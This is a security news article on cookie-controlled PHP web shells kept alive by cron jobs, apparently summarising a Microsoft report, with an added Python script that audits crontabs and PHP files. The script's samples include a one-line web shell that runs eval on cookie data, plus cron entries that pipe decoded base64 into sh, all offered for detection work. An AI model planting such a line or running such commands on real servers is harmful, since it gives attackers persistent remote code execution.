Threat actors are using cookies as a covert channel to communicate with PHP-based web shells on Linux servers. The method bypasses the usual control channels, such as URL parameters or the request body, while still giving the attackers remote code execution.
Cookies blend in with regular web traffic and are harder to spot, so this method is unlikely to raise red flags. Microsoft suggests using multi-factor authentication for hosting control panels, SSH access, and administrative interfaces. It also suggests monitoring for unusual login activity, preventing shell interpreters from running on web servers, checking for suspicious file creation in web directories, and limiting the capabilities of hosting control panels.
"Instead of using complicated exploit chains, the threat actor used legitimate execution paths that were already in place, such as web server processes, control panel components, and cron infrastructure, to stage and keep malicious code," Microsoft said. The company said that the consistent use of cookies as the control mechanism shows that established web shell tradecraft is being reused. The company went on to say, "By putting control logic into cookies, threat actors make it possible for persistent post-compromise access that can get around many traditional inspection and logging controls."
The attackers first gained access to the victim's hosted Linux environment using valid credentials or by exploiting a known vulnerability, then set up a cron job that periodically runs a shell routine, which in turn launches an obfuscated PHP loader.
Once installed, the PHP loader stays dormant during normal traffic and activates only when it receives HTTP requests carrying specific cookie values. Microsoft said in a blog post that this "self-healing" architecture lets the scheduled task recreate the PHP loader repeatedly, even after it has been removed during cleanup efforts, which keeps the remote code execution channel consistently available and reliable.
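A defender-side check for the two persistence points described above, as an added example that is not Microsoft's tooling and not from the original report: it flags cron entries that point an interpreter at a web root or carry encoded commands, and PHP source lines where cookie data reaches a code-execution sink. The crontab text and PHP snippet are constructed samples; the web-root paths and the sink list are assumptions.

```python
import re
from typing import List, Tuple

# Constructed sample, shaped like `crontab -l` output on a hosted Linux box.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /bin/sh /var/www/html/.cache/run.sh >/dev/null 2>&1
@reboot /usr/bin/php /var/www/html/wp-content/uploads/loader.php
* * * * * echo aGVsbG8= | base64 -d | sh
"""

# Constructed PHP snippet: line 2 is a benign cookie read, line 3 is an
# indicator-bearing line where cookie data reaches eval().
SAMPLE_PHP = """<?php
$lang = $_COOKIE['lang'] ?? 'en';
if (isset($_COOKIE['k'])) { @eval(base64_decode($_COOKIE['k'])); }
"""

# Assumed interpreter names, web roots and sinks; tune for the environment.
INTERPRETERS = re.compile(r"(?:^|[\s/])(?:php\d*|sh|bash|dash|perl|python\d*)\b")
WEB_ROOTS = ("/var/www", "/srv/www", "/home/", "/usr/share/nginx")
DECODE_HINTS = re.compile(r"base64|\\x[0-9a-f]{2}|eval\s*\(", re.I)
SINKS = r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open|create_function)"
COOKIE_SINK = re.compile(SINKS + r"\s*\([^;]*\$_COOKIE", re.I)

def audit_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (reason, entry) pairs for cron entries that deserve a look:
    an interpreter run against a file under a web root (where a recreated
    PHP loader would live), or a command carrying decode/eval hints."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # "@keyword command" has two fields; "m h dom mon dow command" has six.
        parts = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        if len(parts) < (2 if line.startswith("@") else 6):
            continue
        cmd = parts[-1]
        if INTERPRETERS.search(cmd) and any(root in cmd for root in WEB_ROOTS):
            findings.append(("interpreter run against web root", line))
        elif DECODE_HINTS.search(cmd):
            findings.append(("encoded/eval payload in command", line))
    return findings

def cookie_controlled_sinks(php_source: str) -> List[int]:
    """1-based line numbers where a code-execution sink takes $_COOKIE input."""
    return [n for n, l in enumerate(php_source.splitlines(), 1) if COOKIE_SINK.search(l)]

if __name__ == "__main__":
    for reason, entry in audit_crontab(SAMPLE_CRONTAB):
        print(f"[cron] {reason}: {entry}")
    print("[php] cookie-to-sink lines:", cookie_controlled_sinks(SAMPLE_PHP))
```

Run it against real `crontab -l` output for the web user and root, and against each PHP file under the web root, to triage before a deeper review.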